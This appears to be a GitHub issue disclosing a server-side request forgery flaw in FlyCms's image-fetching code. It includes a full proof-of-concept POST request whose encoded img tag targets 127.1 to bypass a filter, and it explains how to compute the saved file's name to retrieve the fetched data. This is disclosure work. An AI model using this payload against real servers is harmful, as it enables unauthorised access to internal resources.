You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
An issue was discovered in FlyCms. There is a security vulnerability in file /Users/bang/code/java/FlyCms-master/src/main/java/com/flycms/module/question/service/ImagesService.java, in saveUrlAs() function, result in a SSRF . SSRF Server Side Request Forgery attacks. The ability to create requests from the vulnerable server to intra/internet.
POST /ucenter/question/add HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://localhost/question/add
Content-Length: 93
Cookie: CFID=3; CFTOKEN=50139797; ECS[visit_times]=1; bgC_sid=P5rfbe; JSESSIONID=node01jp6c3qjsftrz1xa81ovh47bff0.node0; Hm_lvt_2f24154b3f87697d36a4e2a638b68aaa=1560325064; Hm_lpvt_2f24154b3f87697d36a4e2a638b68aaa=1560328852; FlyCmsId=593f391df8a70cab630e34efa645c590
Connection: close
title=ssrf10&content=%3Cimg%20src%3D%22http%3A%2F%2F127.1%2Findex%22%2F%3E&tags=ssrf7&price=0
We can see that it will call replaceContent to fetch remote image when add a question.
In funtion replaceContent,we can use 127.1 bypass reg or request other url directly,and saveUrlAs is called here.
Finally HttpURLConnection result in SSRF.
Still in replaceContent, we can find the file path, file name.The addQuesion finally failed, but file will create.
File path is the date tody, example /upload/content/2019/6/12/
File name is concat md5(date + filenum) + filenum + extension
md5 16 result is 8-24 of md5_32 resulst.
And we can get server time from response, after convert timezone, we can caculate the result.
so filename is 43EC4555543DEFC6_0.,absolute path is /upload/content/2019/6/12/43EC4555543DEFC6_0.
Request the path we can download file named 43EC4555543DEFC6_0..
It's SSRF result.
The text was updated successfully, but these errors were encountered:
An issue was discovered in FlyCms. There is a security vulnerability in file
/Users/bang/code/java/FlyCms-master/src/main/java/com/flycms/module/question/service/ImagesService.java, in saveUrlAs() function, result in a SSRF . SSRF Server Side Request Forgery attacks. The ability to create requests from the vulnerable server to intra/internet.POC
%3Cimg%20src%3D%22http%3A%2F%2F127.1%2Findex%22%2F%3ESend the request is as follows:
We can see that it will call replaceContent to fetch remote image when add a question.
In funtion replaceContent,we can use
127.1bypass reg or request other url directly,and saveUrlAs is called here.Finally
HttpURLConnectionresult in SSRF.Still in replaceContent, we can find the file path, file name.The addQuesion finally failed, but file will create.
File path is the date tody, example
/upload/content/2019/6/12/File name is concat md5(date + filenum) + filenum + extension
md5 16 result is 8-24 of md5_32 resulst.
And we can get server time from response, after convert timezone, we can caculate the result.
so filename is
43EC4555543DEFC6_0.,absolute path is/upload/content/2019/6/12/43EC4555543DEFC6_0.Request the path we can download file named
43EC4555543DEFC6_0..It's SSRF result.
The text was updated successfully, but these errors were encountered: